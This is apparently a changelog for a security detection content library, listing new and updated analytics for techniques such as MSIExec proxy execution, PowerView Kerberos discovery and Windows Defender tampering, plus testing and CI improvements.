New Analytic Story
- Windows System Binary Proxy Execution MSIExec
New Analytics
- Potential password in username (Thanks to @mbjerkeland from Splunk)
- Added PowerView SPN Discovery
- Added PowerView Kerberos Ticket Request
- Windows Impair Defense Delete Win Defender Context Menu
- Windows Impair Defense Delete Win Defender Profile Registry
- Windows Impair Defenses Disable Win Defender Auto Logging
- Windows MSIExec DLLRegisterServer
- Windows MSIExec Remote Download
- Windows MSIExec Spawn Discovery Command
- Windows MSIExec Unregister DLLRegisterServer
- Windows MSIExec With Network Connections
Updated Analytics
- Outbound Network Connection from Java Using Default Ports
- Rundll32 LockWorkStation
- Splunk Command and Scripting Interpreter Risky Commands (released in v3.43.1)
BA Updates
- Deprecated 3 complex BA and test files
Other Updates
- Tagged detections with correct datamodels
- Improvements to the automated detection testing framework
- Several key updates to contentctl project code for optimizations, improved error handling and git-actions workflow in our CI/CD